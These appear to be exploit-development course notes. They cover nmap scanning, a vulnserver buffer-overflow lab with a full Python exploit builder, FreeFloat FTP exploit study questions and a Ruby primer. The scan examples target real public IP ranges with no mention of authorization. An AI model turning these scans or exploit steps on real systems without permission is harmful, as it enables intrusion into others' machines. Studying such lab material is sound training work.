Exploit Dev 2020
joemccray
Jun 3rd, 2019

########################
# Scanning Methodology #
########################

- Ping Sweep
What's alive?
------------

---------------------------Type this command-----------------------------------
sudo nmap -sP 157.166.226.*
-------------------------------------------------------------------------------

- Note: -sP is the old name for nmap's host-discovery (ping) scan; current versions call it -sn and keep -sP as an alias. Hosts that drop ICMP will not show up here, so an empty result does not prove the range is dead.

- If -sP yields no results try:
---------------------------Type this command-----------------------------------
sudo nmap -sL 157.166.226.*
-------------------------------------------------------------------------------

- Note: -sL is a list scan. It sends nothing to the targets and only does a reverse-DNS lookup on each address, so it tells you which names exist in the range, not which hosts are up.

- Look for hostnames:
---------------------------Type this command-----------------------------------
sudo nmap -sL 157.166.226.* | grep cnn
-------------------------------------------------------------------------------

- Port Scan
What's where?
------------
---------------------------Type this command-----------------------------------
sudo nmap -sS 162.243.126.247
-------------------------------------------------------------------------------

- Note: -sS is a SYN (half-open) scan and needs raw sockets, which is why these commands run under sudo.

- Bannergrab/Version Query
What versions of software are running?
--------------------------------------

---------------------------Type this command-----------------------------------
sudo nmap -sV 162.243.126.247
-------------------------------------------------------------------------------

- Vulnerability Research
Look up the banner versions for public exploits
-----------------------------------------------
https://www.exploit-db.com/search
http://securityfocus.com/bid
https://packetstormsecurity.com/files/tags/exploit/

Network Penetration Testing Process (known vulnerabilities)
-----------------------------------------------------------

1. Ping Sweep:
The purpose of this step is to identify live hosts.

nmap -sP <ip-address/ip-range>

2. Port Scan
Identify listening services. The open ports tell you what each host is for (web server, file server, domain controller) and help you map the network.

nmap -sS <ip-address/ip-range>

3. Bannergrab
Identify the version of the software running on each open port.

nmap -sV <ip-address/ip-range>

4. Vulnerability Research
Use the software version number to research whether it is out of date (vulnerable).

exploit-db.com/search
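
- Worked example (added to these notes; it is not one of the course scripts): once the bannergrab step is done, the versions have to be pulled out of the scan and taken to the research sites. The script below parses nmap's grepable output (nmap -sV -oG scan.gnmap <target>) into a per-port list and a de-duplicated lookup queue. The scan output embedded in it is constructed sample data, not a real scan; the hosts, ports and banners are made up. It relies on nmap's documented -oG layout of port/state/protocol/owner/service/rpcinfo/version per port entry.

```python
"""Parse nmap grepable (-oG) output from the bannergrab step into a service/version
list for the vulnerability-research step. Added example; sample data is constructed."""
import re
from collections import namedtuple

Service = namedtuple("Service", "host port proto state service version")

# Constructed sample of `nmap -sV -oG -` output; hosts, ports and banners are made up.
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated as: nmap -sV -oG - 10.0.0.0/29
Host: 10.0.0.5 ()\tStatus: Up
Host: 10.0.0.5 ()\tPorts: 21/open/tcp//ftp//vsftpd 3.0.3/, 22/open/tcp//ssh//OpenSSH 7.4 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.6/, 443/filtered/tcp//https///\tIgnored State: closed (996)
Host: 10.0.0.6 (files.lab.local)\tPorts: 445/open/tcp//microsoft-ds//Samba smbd 3.X - 4.X (workgroup: LAB)/, 8080/open/tcp//http-proxy///\tIgnored State: closed (998)
# Nmap done -- 8 IP addresses (2 hosts up) scanned
"""

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")


def parse_gnmap(text):
    """One Service per open port in nmap grepable output.
    Each entry in the 'Ports:' field is port/state/proto/owner/service/rpcinfo/version/
    (nmap substitutes '|' for any '/' inside the service/version text, so splitting
    on '/' is safe)."""
    found = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                                   # comment and summary lines
        fields = line.split("\t")                      # -oG separates fields with tabs
        m = HOST_RE.match(fields[0])
        ports_field = next((f for f in fields if f.startswith("Ports: ")), None)
        if not m or ports_field is None:
            continue                                   # e.g. the 'Status: Up' line carries no ports
        host = m.group(1)
        for entry in ports_field[len("Ports: "):].split(", "):
            parts = entry.split("/")
            if len(parts) < 7:
                continue
            port, state, proto, _owner, svc, _rpc, version = parts[:7]
            if state == "open":                        # closed/filtered ports have nothing to bannergrab
                found.append(Service(host, int(port), proto, state, svc, version.strip()))
    return found


def research_queue(services):
    """Distinct strings to look up on exploit-db / Packet Storm, in scan order.
    Falls back to the service name when nmap could not identify a version."""
    queue = []
    for s in services:
        key = s.version or s.service
        if key not in queue:
            queue.append(key)
    return queue


if __name__ == "__main__":
    services = parse_gnmap(SAMPLE_GNMAP)
    for s in services:
        print("%s:%d/%s %-14s %s" % (s.host, s.port, s.proto, s.service, s.version))
    print("\nLook these up:")
    for item in research_queue(services):
        print(" -", item)
```

Run it against a real file with parse_gnmap(open("scan.gnmap").read()); ports whose version field is empty come back under the bare service name, which is your cue to bannergrab them by hand (nc to the port) before searching.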

Skill Level 1. Run the scanners
-------------------------------
Nexpose
Qualys
Retina
Nessus
OpenVAS
Foundscan
GFI LanGuard
nCircle

- These all report known vulnerabilities, matched mostly on banners and version numbers, so their findings still need to be validated.

Skill Level 2. Manual vulnerability validation (known vulnerabilities)
-----------------------------------------------------------------------
Confirm a scanner finding by checking the installed version on the host itself and comparing it with the fixed version in the advisory:

Windows -> systeminfo
Linux   -> dpkg -l   (Debian/Ubuntu)
           rpm -qa   (Red Hat/CentOS/SUSE)
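
- Worked example (added here; not part of the course material): the check a scanner does is a version comparison against the advisory's "fixed in" version, and getting the ordering wrong is how false positives (and false negatives) happen: 1.10 is newer than 1.9, 1.0~rc1 is older than 1.0, and 1:1.0 beats 2.0 because of the epoch. The script below takes dpkg -l output and a fixed-version table and implements Debian's ordering rules to flag what is actually out of date. Both the dpkg -l listing and the fixed-version table are constructed sample data, not a real advisory. RPM hosts (rpm -qa) use a different comparison algorithm and are not covered.

```python
"""Validate 'known vulnerability' findings on a Debian/Ubuntu host by comparing
dpkg -l versions against advisory fixed versions with dpkg's ordering rules.
Added example; the listing and the fixed-version table are constructed samples."""

# Constructed `dpkg -l` output (on a real target: dpkg -l > installed.txt)
SAMPLE_DPKG_L = """\
Desired=Unknown/Install/Remove/Purge/Hold
||/ Name             Version            Architecture Description
+++-================-==================-============-==================================
ii  bash             4.4-5              amd64        GNU Bourne Again SHell
ii  libssl1.1:amd64  1.1.0l-1~deb9u1    amd64        Secure Sockets Layer toolkit - shared libraries
ii  openssl          1.1.0l-1~deb9u1    amd64        Secure Sockets Layer toolkit - cryptographic utility
ii  sudo             1.8.19p1-2.1       amd64        Provide limited super user privileges
rc  old-daemon       0.9-1              amd64        removed package, config files remain
"""

# Constructed "fixed in" table as you would transcribe it from an advisory (sample values only)
FIXED_VERSIONS = {
    "openssl":   "1.1.0l-1~deb9u3",
    "libssl1.1": "1.1.0l-1~deb9u3",
    "sudo":      "1.8.19p1-2.1",
    "bash":      "4.4-4",
}


def _order(c):
    """Character weight dpkg uses for the non-digit parts of a version string."""
    if c.isdigit():
        return 0
    if c.isalpha():
        return ord(c)
    if c == "~":
        return -1            # '~' sorts before everything, even the end of the string
    if c:
        return ord(c) + 256  # other punctuation sorts after letters
    return 0                 # end of string


def _verrevcmp(a, b):
    """dpkg's verrevcmp: alternate non-digit runs (by _order) and digit runs (numerically)."""
    i = j = 0
    ch = lambda s, k: s[k] if k < len(s) else ""
    while i < len(a) or j < len(b):
        first_diff = 0
        while (i < len(a) and not a[i].isdigit()) or (j < len(b) and not b[j].isdigit()):
            ac, bc = _order(ch(a, i)), _order(ch(b, j))
            if ac != bc:
                return ac - bc
            i += 1
            j += 1
        while ch(a, i) == "0":           # leading zeros are insignificant
            i += 1
        while ch(b, j) == "0":
            j += 1
        while ch(a, i).isdigit() and ch(b, j).isdigit():
            if not first_diff:
                first_diff = ord(a[i]) - ord(b[j])
            i += 1
            j += 1
        if ch(a, i).isdigit():
            return 1                     # a has more digits left, so it is the larger number
        if ch(b, j).isdigit():
            return -1
        if first_diff:
            return first_diff
    return 0


def split_version(v):
    """'epoch:upstream-revision' -> (epoch, upstream, revision); epoch defaults to 0, revision to ''."""
    epoch = 0
    if ":" in v:
        e, v = v.split(":", 1)
        epoch = int(e)
    upstream, _, revision = v.rpartition("-") if "-" in v else (v, "", "")
    return epoch, upstream, revision


def dpkg_compare(a, b):
    """-1, 0 or 1, matching `dpkg --compare-versions a lt/eq/gt b`."""
    ea, ua, ra = split_version(a)
    eb, ub, rb = split_version(b)
    if ea != eb:
        return -1 if ea < eb else 1
    r = _verrevcmp(ua, ub) or _verrevcmp(ra, rb)
    return (r > 0) - (r < 0)


def parse_dpkg_l(text):
    """Installed (status 'ii') packages -> {name: version}; the ':arch' suffix is dropped."""
    installed = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0] == "ii":
            installed[parts[1].split(":")[0]] = parts[2]
    return installed


def find_vulnerable(installed, fixed):
    """(name, installed, fixed) for every package whose version sorts before the fixed one."""
    hits = []
    for name, fixed_ver in fixed.items():
        cur = installed.get(name)
        if cur is not None and dpkg_compare(cur, fixed_ver) < 0:
            hits.append((name, cur, fixed_ver))
    return sorted(hits)


if __name__ == "__main__":
    for name, cur, fixed_ver in find_vulnerable(parse_dpkg_l(SAMPLE_DPKG_L), FIXED_VERSIONS):
        print("VULNERABLE %-12s installed %-18s fixed in %s" % (name, cur, fixed_ver))
```

On a Debian box you can cross-check any single result with dpkg --compare-versions "$installed" lt "$fixed"; the point of carrying the algorithm in the script is that you can run it on the attacker machine against a listing copied off the target.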

#####################################
# Quick Stack Based Buffer Overflow #
#####################################

- You can download everything you need for this exercise from the link below (copy nc.exe into the c:\windows\system32 directory)
http://45.63.104.73/ExploitLab.zip

- Extract the ExploitLab.zip file to your Desktop

- Go to folder C:\Users\student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe

- Open a new command prompt and type:

---------------------------Type This-----------------------------------
nc localhost 9999
--------------------------------------------------------------------------

- In the new command prompt window where you ran nc type:
HELP

- Go to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts
- Right-click on 1-simplefuzzer.py and choose the option edit with Notepad++ so you can read what it sends

- Now double-click on 1-simplefuzzer.py
- You'll notice that vulnserv.exe crashes. Be sure to note which command it crashed on and how many As it took.

- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note which command it crashed on and how many As it took. A crash at the same command and length both times is what you want before you move to the debugger.

- Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe

- Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.

- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (0x41 bytes).

- Now isolate the crash by restarting your debugger and running script 2-3000chars.py

- Calculate the distance to EIP by running script 3-3000chars.py
- This script sends 3000 non-repeating chars to vulnserv.exe and populates EIP with the value: 396F4338

4-count-chars-to-EIP.py
- In the previous script we saw EIP overwritten with 396F4338. x86 is little-endian, so the bytes as they sit in our buffer are 38 43 6F 39, i.e. 8 (38), C (43), o (6F), 9 (39)
- so we search for 8Co9 in the string of non-repeating chars and count the distance to it

5-2006char-eip-check.py
- In this script we check that our calculation of the distance to EIP is correct by overwriting EIP with 42424242 (BBBB)

6-jmp-esp.py
- In this script we overwrite EIP with the address of a JMP ESP (6250AF11) inside of essfunc.dll, so execution lands on the bytes we place right after the return address

7-first-exploit
- In this script we actually do the stack overflow and launch a bind shell on port 4444

8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP, or copy it and paste the code into the host.

------------------------------

Skill Level 3. Identify unknown vulnerabilities
-----------------------------------------------

- App Type
------------
Stand Alone / Client Server / Web App

***(vulnserv.exe)***

- Input Type
-------------
File / logical network port / Browser
Keyboard
Mouse

***(9999)***

- Map & Fuzz app entry points:
------------------------------
- Commands ***(commands)***
- Methods
- Verbs
- functions
- subroutines
- controllers

- Isolate the crash
-------------------
App seems to reliably crash at TRUN 2100

- Calculate the distance to EIP
-------------------------------
Distance to EIP is 2006

We found that EIP was populated with the value: 396F4338
396F4338 read little-endian is 8 (38), C (43), o (6F), 9 (39), so we search for 8Co9 in the non-repeating pattern

An online tool that we can use for this is:
https://zerosum0x0.blogspot.com/2016/11/overflow-exploit-pattern-generator.html

Metasploit ships the same thing as pattern_create.rb and pattern_offset.rb under tools/exploit.

- Redirect Program Execution
----------------------------
A 3rd party DLL named essfunc.dll seems to be the best candidate for the 'JMP ESP' instruction.
We learned that we control EAX and ESP in script 2.

- Implement Shellcode
---------------------
The two things that most often go wrong with shellcode:
- Not enough space
- Bad characters
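
- Worked example (added to these notes; it is not one of the lab's numbered scripts): the whole chain above in one Python file, so you can see how the pieces fit together. It generates increasing fuzz buffers, builds the non-repeating pattern the way pattern_create.rb does, turns the EIP value 396F4338 back into the offset 2006 (little-endian, so the bytes searched for are 8Co9), produces a bad-character probe, and assembles the final TRUN buffer around the JMP ESP in essfunc.dll. Assumptions: the 2006-byte offset is measured from the first byte after the "TRUN ." command text (the lab scripts send their payload after the command; check yours), registers are 32-bit little-endian, and the shellcode is a 4-byte INT3 placeholder that you replace with msfvenom output once the bad characters are known. The function that actually connects to vulnserver is only called if you uncomment it.

```python
"""vulnserver TRUN overflow helpers: fuzz buffers, pattern create/offset, bad-char
probe, final buffer. Added example for these notes; see the lead-in for assumptions."""
import socket
import struct
from string import ascii_uppercase, ascii_lowercase, digits

MAX_PATTERN = len(ascii_uppercase) * len(ascii_lowercase) * len(digits) * 3   # 20280, same limit as pattern_create.rb
COMMAND = b"TRUN ."                   # assumed command prefix; the offset below is counted from the byte after it
JMP_ESP = 0x6250AF11                  # JMP ESP inside essfunc.dll (from the lab notes)
OFFSET_TO_EIP = 2006                  # distance to EIP for TRUN (from the lab notes)
PLACEHOLDER_SHELLCODE = b"\xCC" * 4   # INT3 x4: the debugger breaks at ESP; replace with msfvenom output


def fuzz_buffers(command=COMMAND, step=100, limit=3000):
    """Buffers a simple fuzzer would send, growing by `step` bytes, until `limit`."""
    for n in range(step, limit + 1, step):
        yield command + b"A" * n


def pattern_create(length):
    """Non-repeating pattern in the same order as Metasploit's pattern_create.rb:
    Aa0Aa1Aa2...Aa9Ab0Ab1...; any 4 consecutive bytes occur at exactly one offset."""
    if length > MAX_PATTERN:
        raise ValueError("pattern longer than %d bytes would repeat" % MAX_PATTERN)
    out = bytearray()
    for upper in ascii_uppercase:
        for lower in ascii_lowercase:
            for digit in digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(eip_value, length=3000):
    """Offset of the bytes that ended up in EIP. The debugger shows the register as
    396F4338, but it was loaded little-endian from the stack, so the bytes in the
    buffer are 38 43 6F 39 = b'8Co9'."""
    needle = struct.pack("<I", eip_value)
    offset = pattern_create(length).find(needle)
    if offset < 0:
        raise ValueError("EIP value %08X not found in pattern; check length/endianness" % eip_value)
    return offset


def badchar_probe(known_bad=(0x00,)):
    """Every byte value except the ones already known to be bad. Send it after the
    EIP overwrite and follow ESP in the dump: the first byte that is missing or
    mangled is the next bad character to add to known_bad."""
    return bytes(b for b in range(256) if b not in known_bad)


def build_trun_exploit(offset=OFFSET_TO_EIP, ret=JMP_ESP,
                       shellcode=PLACEHOLDER_SHELLCODE, nops=16, total=3000):
    """Layout: [junk to EIP][ret, little-endian][NOP sled][shellcode][padding to crash size].
    Padding to the same total as the crashing request keeps the stack layout the same
    as when the crash was isolated."""
    payload = b"A" * offset + struct.pack("<I", ret) + b"\x90" * nops + shellcode
    if len(payload) > total:
        raise ValueError("not enough space: payload is %d bytes, buffer is %d" % (len(payload), total))
    payload += b"C" * (total - len(payload))
    return COMMAND + payload


def send_to_vulnserver(data, host="127.0.0.1", port=9999, timeout=5):
    """Connect to vulnserver, read its welcome banner, send the buffer (only when run directly)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.recv(1024)
        sock.sendall(data + b"\r\n")


if __name__ == "__main__":
    print("offset to EIP:", pattern_offset(0x396F4338))
    buf = build_trun_exploit()
    start = len(COMMAND) + OFFSET_TO_EIP
    print("bytes landing in EIP:", buf[start:start + 4].hex())
    print("bad-char probe length:", len(badchar_probe()))
    # send_to_vulnserver(buf)   # uncomment with vulnserv.exe attached in OllyDbg
```

If pattern_offset raises, the most common causes are a wrong endianness (you searched for 39 6F 43 38) or a pattern shorter than the one that was actually sent; the same function with a different eip_value answers the "did our math hold" check of script 5, where 42424242 should not be found at all.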

#########################################
# FreeFloat FTP Server Exploit Analysis #
#########################################

Analyze the following exploit code:
https://www.exploit-db.com/exploits/15689/

1. What is the target platform that this exploit works against?
2. What is the variable name for the distance to EIP?
3. What is the actual distance to EIP in bytes?
4. Describe what is happening in the variable 'junk2'

Analysis of the training walk-through based on EDB-ID 15689:
http://45.63.104.73/ff.zip

ff1.py
1. What does the sys module do?
2. What are sys.argv[1] and sys.argv[2]?
3. What application entry point is being attacked in this script?

ff2.py
1. Explain what lines 18 - 20 are doing.
2. What is pattern_create.rb doing and where can I find it?
3. Why can't I just double-click the file to run this script?

ff3.py
1. Explain what is happening in lines 17 to 25.
2. Explain what is happening in lines 30 to 32.
3. Why is everything below line 35 commented out?

ff4.py
1. Explain what is happening in lines 13 to 15.
2. Explain what is happening in line 19.
3. What is the total length of buff?

ff5.py
1. Explain what is happening in line 15.
2. What is struct.pack?
3. How big is the shellcode in this script?

ff6.py
1. What is the distance to EIP?
2. How big is the shellcode in this script?
3. What is the total byte length of the data being sent to this app?

ff7.py
1. What is a tuple in Python?
2. How big is the shellcode in this script?
3. Did your app crash from this script?

ff8.py
1. How big is the shellcode in this script?
2. What is try/except in Python?
3. What is socket.SOCK_STREAM in Python?

ff9.py
1. What is going on in lines 19 and 20?
2. What is the length of the NOPs?
3. From what DLL did the address of the JMP ESP come?

ff010.py
1. What is going on in lines 18 - 20?
2. What is going on in lines 29 - 32?
3. How would a stack adjustment help this script?

Required review videos to watch tonight:
----------------------------------------
https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl
Please watch videos 1-5 tonight. Vivek has a deep accent, so I understand that it may be difficult, but his material is very good - probably the best on the internet today.

Recommended (not required) videos to watch tonight:
---------------------------------------------------
For more background on assembly I would recommend the following video series (videos 1-11):
https://www.youtube.com/playlist?list=PL6brsSrstzga43kcZRn6nbSi_GeXoZQhR
Again, you DO NOT have to watch these tonight, but if you are really interested in the subject of exploit development I think they will be very helpful.

###################################
# Day 2: Programming Fundamentals #
###################################
How I did it:

Step 1: Watch and do the newboston Python video series twice
https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA

Step 2: Watch and do the Google Python workshop twice
https://www.youtube.com/playlist?list=PLfZeRfzhgQzTMgwFVezQbnpc1ck0I6CQl

Step 3: Download all of the Python tools from PacketStorm and analyze the source code
https://packetstormsecurity.com/files/tags/python

Here is the code from Packet Storm:
http://45.63.104.73/PythonReferenceCode.zip

I went through almost every single file and looked up the code that I didn't understand.
I also asked programmers to help me understand the lines of code that didn't make sense.
For the folder RAC-Brute I actually had to hire a developer from an outsourcing website to comment on
and explain the tool to me.

Here is what I got out of doing that:
https://s3.amazonaws.com/infosecaddictsfiles/sorted-commented-python-files.zip

Distilled that into this:
http://45.63.104.73/Python-Courseware.zip

########################
# Introduction to Ruby #
########################
- Ruby is a general-purpose, object-oriented programming language created by Yukihiro Matsumoto, a computer
scientist and programmer from Japan. It is a cross-platform dynamic language.

- The major implementations of the language are Ruby MRI, JRuby, HotRuby, IronRuby, MacRuby, etc. Ruby
on Rails is a web framework written in Ruby. Metasploit is written in Ruby too, which is why it matters for this course.

- Ruby's file name extensions are .rb and .rbw.

- Official website of the language: www.ruby-lang.org

- Ruby ships with an interactive shell called IRB (Interactive Ruby).

- Open up the interactive console and play around.

---------------------------Type This-----------------------------------
irb
-----------------------------------------------------------------------

- Math, Variables, Classes, Creating Objects and Inheritance

The following arithmetic operators:
Addition operator (+) — 10 + 23
Subtraction operator (-) — 1001 - 34
Multiplication operator (*) — 5 * 5
Division operator (/) — 12 / 2   (integer division when both sides are integers: 12 / 2 is 6, but 7 / 2 is 3, not 3.5)

- Now let's cover some variable techniques. In Ruby, you assign a value to a variable with the assignment
operator '='. In the following example, 25 is assigned to x. The line 'x + 30' then evaluates to 55, but it
does not change x: x is still 25 afterwards, because nothing was assigned back. The same goes for y and
'y+33'. To actually increment a variable you write x += 30 (covered under shortcuts below).

---------------------------Type This-----------------------------------
x = 25
x + 30
y = 69
y+33
-----------------------------------------------------------------------

- Let's look at creating classes and creating objects.

- Here, the name of the class is Attack. An object has its properties (attributes) and methods. attr_accessor
creates a getter and a setter for each attribute listed.

---------------------------Type This-----------------------------------
class Attack
attr_accessor :of, :sqli, :xss
end
-----------------------------------------------------------------------

What is nil?
Reference:
https://www.codecademy.com/en/forum_questions/52a112378c1cccb0f6001638

nil is the Ruby object that represents nothingness. Whenever a method doesn't return a useful value, it returns nil. puts and print are methods that return nil.

Since the Ruby console always shows the value of the last statement or expression in your code, if that last statement is print, you'll see the nil.

To prevent the nil from "sticking" to the output of print (which doesn't insert a line break), you can print a line break after it, and optionally put some other value as the last statement of your code; then the console will show it instead of nil.

# Now that we have created the class let's create an object
---------------------------Type This-----------------------------------
first_attack = Attack.new
first_attack.of = "stack"
first_attack.sqli = "blind"
first_attack.xss = "dom"
puts first_attack.of
puts first_attack.sqli
puts first_attack.xss
-----------------------------------------------------------------------

- Let's work on some inheritance that will help make your programming life easier. When we have multiple classes,
inheritance becomes useful. In simple words, inheritance arranges classes in a hierarchy: a subclass
(written 'class Child < Parent') gets the methods and attributes defined in its parent class without repeating
them. Inheritance makes your programming life easier by maximizing code reuse. In the example below every
framework class gets the scanners/exploits/shellcode/postmodules accessors from Exploitframeworks.

---------------------------Type This-----------------------------------
class Exploitframeworks
attr_accessor :scanners, :exploits, :shellcode, :postmodules
end
class Metasploit < Exploitframeworks
end
class Canvas < Exploitframeworks
end
class Coreimpact < Exploitframeworks
end
class Saint < Exploitframeworks
end
class Exploitpack < Exploitframeworks
end
-----------------------------------------------------------------------

- Methods, More Objects, Arguments, String Functions and Expression Shortcuts

- Let's create a simple method. A method is used to perform an action and is generally called on an object.

- Here, the name of the method is 'learning'. This method is defined inside the Msfnl class. When it is called,
it will print this string: "We are Learning how to PenTest"

- An object named 'joe' is created, which is used to call the method.

---------------------------Type This-----------------------------------
class Msfnl
def learning
puts "We are Learning how to PenTest"
end
end
-----------------------------------------------------------------------

# Now let's create an object and call our method on it

---------------------------Type This-----------------------------------
joe = Msfnl.new
joe.learning
-----------------------------------------------------------------------

- An argument is a value or variable that is passed to a method when calling it. In the following example, while
calling the puts method, we are sending a string value to it. This string value is used by the
method to perform some particular operation (here, printing it).

puts("Pentesting")

- There are many useful string methods in Ruby. String methods make it easy to work with strings. Now, we will
explain some useful string methods with an example.

- The length method returns the length of a string. The upcase method converts a string to uppercase. And the
reverse method reverses a string. Methods can be chained, as in the last line below. The following example
demonstrates how to use the string methods.

---------------------------Type This-----------------------------------
55.class
"I Love Programming".class
"I Love Pentesting".length
"Pown that box".upcase
"Love" + "To Root Boxes"
"evil".reverse
"evil".reverse.upcase
-----------------------------------------------------------------------

- Expressions and shortcuts. In the example below, 'a' is an operand, '3' is an operand, '=' is
an operator, and 'a=3' is the expression. A statement consists of one or more expressions. Following are
examples of some expressions.

---------------------------Type This-----------------------------------
a = 3
b = 6
a+b+20
d = 44
f = d
puts f
-----------------------------------------------------------------------

- Shortcuts. +=, *= are the shortcuts. These operators are also called abbreviated
assignment operators. Use the shortcuts to get the effect of two statements in just one. Consider the following
statements to understand the shortcuts.

---------------------------Type This-----------------------------------
g = 70
g = g+44
g += 33
-----------------------------------------------------------------------

- In the last statement, g is incremented by 33 and the total is assigned back to g (g is now 147).

---------------------------Type This-----------------------------------
g *= 3
-----------------------------------------------------------------------

- In the above statement, g is multiplied by 3 and the result is assigned back to g (441).

- Comparison Operators, Loops, Data Types, and Constants

- Comparison operators are used for comparing one variable or constant with another variable or constant. We will show
how to use the following comparison operators.

'Less than' operator (<): This operator is used to check whether a variable or constant is less than another
variable or constant. If it's less than the other, the 'less than' operator returns true.

'Equal to' operator (==): This operator is used to check whether a variable or constant is equal to another variable
or constant. If it's equal to the other, the 'equal to' operator returns true. (Note the double '='; a single '=' is assignment.)

'Not equal to' operator (!=): This operator is used to check whether a variable or constant is not equal to another
variable or constant. If it's not equal to the other, the 'not equal to' operator returns true.

---------------------------Type This-----------------------------------
numberofports = 55
puts "number of ports found during scan" if numberofports < 300
numberofports = 400
puts "number of ports found during scan" if numberofports < 300
puts "number of ports found during scan" if numberofports == 300
puts "number of ports found during scan" if numberofports != 300
-----------------------------------------------------------------------

- Only the first and the last puts print: 55 < 300 is true, 400 < 300 and 400 == 300 are false, and 400 != 300 is true.

- The 'OR' operator and the 'unless' keyword. The symbol '||' represents the logical 'OR' operator.

- This operator is generally used to combine multiple conditions.
- In the case of two conditions, if either or both of the conditions is true, the 'OR' operator returns true. Consider the
following example to understand how this operator works.

---------------------------Type This-----------------------------------
ports = 100
puts "number of ports found on the network" if ports<100 || ports>200
puts "number of ports found on the network" if ports<100 || ports>75
-----------------------------------------------------------------------

- The first line prints nothing (100 is neither below 100 nor above 200); the second prints, because 100 > 75.

# unless

---------------------------Type This-----------------------------------
portsbelow1024 = 50
puts "If the ports are below 1024" unless portsbelow1024 < 1000
puts "If the ports are below 1024" unless portsbelow1024 < 1055
puts "If the ports are below 1024" unless portsbelow1024 < 20
-----------------------------------------------------------------------

- The 'unless' keyword runs the statement only when the condition is false, i.e. it is the opposite of 'if'. Here only the last line prints, since 50 < 20 is false.

- Loops are used to execute statement(s) repeatedly. Suppose you want to print a string 10 times.

- See the following example to understand how a string is printed 10 times on the screen using a loop.

---------------------------Type This-----------------------------------
10.times do puts "infosecaddicts" end
-----------------------------------------------------------------------

# Or use the curly braces

---------------------------Type This-----------------------------------
10.times {puts "infosecaddicts"}
-----------------------------------------------------------------------

- Changing Data Types: Data type conversion is an important concept in Ruby because it gives you flexibility while
working with different data types. Data type conversion is also known as type casting. In Ruby it is done with
methods such as to_i, to_f and to_s: "9999".to_i + 1 is 10000, while 9999.to_s + "1" is the string "99991".

- Constants: Unlike variables, the values of constants are meant to stay fixed while the program runs. A constant is
any name that starts with a capital letter. Ruby does let you reassign one, but if you do, you will see a warning message.

- Multiple Line String Variable, Interpolation, and Regular Expressions

- A multiple line string variable (a heredoc) lets you assign a value to a string variable across multiple lines;
everything between '<<mark' and the closing 'mark' line is the string.

---------------------------Type This-----------------------------------
infosecaddicts = <<mark
welcome
to the
best
metasploit
course
on the
market
mark
puts infosecaddicts
-----------------------------------------------------------------------

- Interpolation lets you evaluate any placeholder within a string, and the placeholder is replaced with the value that
it represents. So whatever you write inside #{ } will be evaluated and the value will be replaced at that position.
Interpolation only happens inside double-quoted strings. Examine the following example to understand how interpolation works in Ruby.

References:
https://stackoverflow.com/questions/10869264/meaning-of-in-ruby

---------------------------Type This-----------------------------------
a = 4
b = 6
puts "a * b = a*b"
puts " #{a} * #{b} = #{a*b} "
person = "Joe McCray"
puts "IT Security consultant person"
puts "IT Security consultant #{person}"
-----------------------------------------------------------------------

- Notice that the placeholders inside #{ } are evaluated and replaced with their values, while the lines without #{ } print literally.

- Character classes
A character class in square brackets matches any one of the characters listed; scan runs the regex over the whole
string and yields every match to the block. (The first line below only sets up a string for you to experiment with.)
---------------------------Type This-----------------------------------
infosecaddicts = "I Scanned 45 hosts and found 500 vulnerabilities"
"I love metasploit and what it has to offer!".scan(/[lma]/) {|y| puts y}
"I love metasploit and what it has to offer!".scan(/[a-m]/) {|y| puts y}
-----------------------------------------------------------------------

- Arrays, Push and Pop, and Hashes

- In the following example, numbers is an array that holds 6 integers. Indexes start at 0.

---------------------------Type This-----------------------------------
numbers = [2,4,6,8,10,100]
puts numbers[0]
puts numbers[4]
numbers[2] = 150
puts numbers
-----------------------------------------------------------------------

- Now we will show how you can implement a stack using an array in Ruby. A stack has two operations: push (<< or push
adds to the end) and pop (removes and returns the last element). shift, by contrast, removes and returns the first
element, which makes the array behave as a queue rather than a stack.

---------------------------Type This-----------------------------------
framework = []
framework << "modules"
framework << "exploits"
framework << "payloads"
framework.pop
framework.shift
-----------------------------------------------------------------------

- After pop returns "payloads" and shift returns "modules", framework is left holding ["exploits"].

- A hash is a collection of elements, like the associative array in other languages. Each element has a key
that is used to access the element.

- Hash is a Ruby object that has its own built-in methods. The methods make it easy to work with hashes.
In this example, 'metasploit' is a hash. 'exploits', 'microsoft', 'Linux' are the keys, and the following are the
respective values: 'what module should you use', 'Windows XP' and 'SSH'.

---------------------------Type This-----------------------------------
metasploit = {'exploits' => 'what module should you use', 'microsoft' => 'Windows XP', 'Linux' => 'SSH'}
print metasploit.size
print metasploit["microsoft"]
metasploit['microsoft'] = 'redhat'
print metasploit['microsoft']
-----------------------------------------------------------------------

- Writing Ruby Scripts

- Let's take a look at one of the Ruby modules and see exactly what it is doing. Now explain to me exactly what
this program is doing. If we take a look at the Ruby program, what you find is that it is a TCP port scanner that
someone made to look for a specific port. The port that it is looking for is port 21, FTP.
---------------------------Type This-----------------------------------
cd /usr/share/metasploit-framework/modules/auxiliary/scanner/portscan
ls
-----------------------------------------------------------------------
  787.  
  788.  
  789.  
  790. ###########################
  791. # Metasploit Fundamentals #
  792. ###########################
  793.  
  794.  
  795. Log into this server:
  796.  
  797.  
  798. Host: 45.77.13.200
  799. protocol: ssh
  800. port: 22
  801. user: linuxclass
  802. pass:
  803.  
  804.  
  805.  
  806.  
  807. - Let's take a little look at Metasploit Framework
  808.  
  809. - First, we should take note of the different directories, the Modular Architecture.
  810.  
  811. The modules that make up the Modular Architecture are
  812. Exploits
  813. Auxiliary
  814. Payload
  815. Encoder
  816. Nops
  817.  
  818.  
  819. Important directories to keep in mind for Metasploit, in case we'd like to edit different modules, or add our own,
  820.  
  821. are
  822.  
  823. Modules
  824. Scripts
